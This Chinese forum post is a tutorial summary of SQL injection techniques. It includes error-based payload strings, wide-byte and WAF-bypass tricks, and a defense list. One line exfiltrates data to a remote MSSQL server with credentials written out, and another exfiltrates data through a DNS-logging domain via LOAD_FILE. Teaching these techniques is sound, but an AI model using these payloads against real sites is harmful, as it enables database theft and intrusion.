sql注入总结

渗透御   ·   发表于 2021-02-03 20:35:52   ·   技术文章

sql注入总结

原理:用户输入的数据当作sql语句拼接到程序代码中执行

可能存在注入的地方:登录页面、搜索处、HTTP头信息等

注入类型:报错注入、header注入、盲注、宽字节注入、mssql反弹注入、dns注入等

报错注入

原理:利用数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中

报错注入相关函数及使用方法:

floor   例句:and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ExtractValue  例句:and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
UpdateXml  例句:and 1=(updatexml(1,concat(0x3a,(selectuser())),1))
exp  例句:and exp(~(select * from (select user () ) a) );
polygon  例句:and polygon (()select * from(select user ())a)b );
......

防御方法:
1、屏蔽能造成报错注入的各种函数
2、统一返回不含错误提示信息的回显页面
3、使用数据库防火墙、拦截危险SQL语句

header注入

原理:利用后端验证客户端口信息或者通过Header中获取客户端的一些信息,
因为这些信息在某些地方是会和其他信息一起存储到数据库中,然后再在前台显示出来,
又因为后台没有进过相对应的信息处理所以构成了sql注入

可能出现的地方
host 客户端指定自己想访问的WEB服务器的域名/IP 地址和端口号
User-Agent 使得服务器能够识别客户使用的操作系统,游览器版本等.
Referer 浏览器向 WEB 服务器表明自己是从哪个页面链接过来的
X-Forwarded-For 简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,
(通常一些网站的防注入功能会记录请求端真实IP地址并写入数据库or某文件[通过修改XXF头可以实现伪造IP])
Clien-IP 同上
Cookie 网站为了辨别用户身份、进行 session 跟踪而储存在用户本地终端上的数据

宽字节注入

原理:利用mysql特性, 在使用GBK编码时将/进行转义ASCII码传输中文是会变成字符串

MySQL中用于转义的函数addslashes、mysql_real_escape_string、mysql_escape_string、magic_quotes_gpc
作用:当PHP的传参中有特殊字符就会在前面加转义字符’\’,来做一定的过滤

绕过思路
因为宽字节注入主要是吃掉 \ ,所以一般时候加一个 %df 这种就可以吃掉,加汉字也可以

mssql反弹注入

原理:依靠opendatasource函数,把查询出来的数据发送到我们的MSSQL服务器上

条件:要满足堆叠查询

环境搭建
使用香港云(http://www.webweb.com/)搭建mssql数据库,获取公网IP

显错注入步骤:
1、判断注入点
2、猜字段
3、联合查询(记住要写union all),输出点用NULL填充,注释只有—
4、select name from dbo.sysdatabases 查询系统库
5、sysobjects 查询系统表 (xtype=’U’)
6、syscolumns 字段 (id= ) 指定sysobjects库中表名对应id

使用的函数
opendatasource函数作用:可以理解为将当前数据库查询的结果发送到另一数据库服务器中

语法:opendatasource(provider_name,init_string)
provider_name :注册为用于访问数据源的OLE DB 提供程序的PROGID的名称,MSSQL的名称为SQLOLEDB
init_string:
连接字符串
连接地址、端口、用户名、密码、数据库名
server=连接地址,端口;uid=用户名;pwd=密码;database=数据库名称

例句:insert into opendatasource(‘sqloledb’,’server=SQL5009.webweb.com,1433;uid=DB_14A5E44_zkaq_admin;
pwd=zkaqzkaq;database=DB_14A5E44_zkaq’).DB_14A5E44_zkaq.dbo.temp select * from admin —

DNS注入(只能使用在mysql)

原理:通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录
此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志

什么是DNS?
是一个域名系统,是一项网络服务,它作为将域名和IP地址相互映射的一个分布式数据库,能够使人更方便地访问互联网,DNS注入就是利用了DNS这个通道

使用的函数
load_file函数作用:用于读取文件内容,并返回输出
使用条件
1、文件必须在服务器上
2、要有绝对路径
3、要有file权限,所有字节可读
4、文件内容必须小于max_allowed_packet(限制server接受的数据包大小函数,默认1MB)

当load_file无法读取文件的解决方法:在mysql配置文件最后一行加一行secure_file_priv=

例句:
and (SELECT LOAD_FILE(CONCAT(‘\\‘,(select database()),’.0cv5gr.ceye.io\abc’)))#
select load_file()打开文件,concat是拼接函数,\\+子查询出来的结果+.0cv5gr.ceye.io\abc
相当于数据库去访问\\+子查询出来的结果+.0cv5gr.ceye.io\abc的共享文件夹然后被DNS服务器记录下来

盲注

理解:利用数据库内置函数执行的结果来判断语句是否被执行

类型
布尔型盲注:根据返回页面判断条件真假的注入
时间型盲注:不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断

用到的函数及语句
length()函数:返回字符串的长度
ascii() 查询ascii码中对应的值
substr(str,pos,num) :截取指定位置指定长度的字符串
mid(str,pos,num) :截取指定位置指定长度的字符串
sleep() 将程序挂起一段时间
if(expr1,expr2,expr3) 判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句

攻击总体思路
1、寻找SQL注入的位置
2、判断服务器类型和后台数据库类型
3、针对不同的服务器和数据库特点进行SQL注入攻击

特殊表
MySQL数据库的特有的表是 information_schema.tables
access数据库特有的表是 msysobjects
SQLServer 数据库特有的表是 sysobjects

数据库重要信息
version() :数据库的版本
database() :当前所在的数据库
@@basedir : 数据库的安装目录
@@datadir :数据库文件的存放目录
user() :数据库的用户
current_user() : 当前用户名
system_user() : 系统用户名
session_user() :连接到数据库的用户名

SQL注入绕过方法
1、大小写绕过
2、双写绕过
3、编码绕过
4、内联注释绕过
5、关键字替换(例如:空格用+替换、and用&&替换等)
6、等价函数绕过(例如:hex()、bin()=ascii()、mid()、substr()=substring()等)
7、HTTP参数污染
8、缓冲区溢出绕过

危害
数据库信息泄露
网页篡改:登陆后台后发布恶意内容
网站挂马 : 当拿到webshell时或者获取到服务器的权限以后,
可将一些网页木马挂在服务器上,去攻击别人
私自添加系统账号
读写文件获取webshell

防御方法
1、对进去数据库的特殊字符(单双引号 尖括号等)进行编码转换
2、不要使用动态拼装SQL,使用参数化SQL
3、不要使用管理员权限的数据连接,最好为每个应用使用单独的数据库连接
4、应用异常信息尽量给出少的提示,最好自定义报错信息对原始报错信息进行包装
5、使用防火墙,安全狗,云盾等

用户名金币积分时间理由
veek 30.00 0 2021-02-04 15:03:05 感谢分享~

打赏我,让我更有动力~

0 Reply   |  Until 2021-2-3 | 810 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.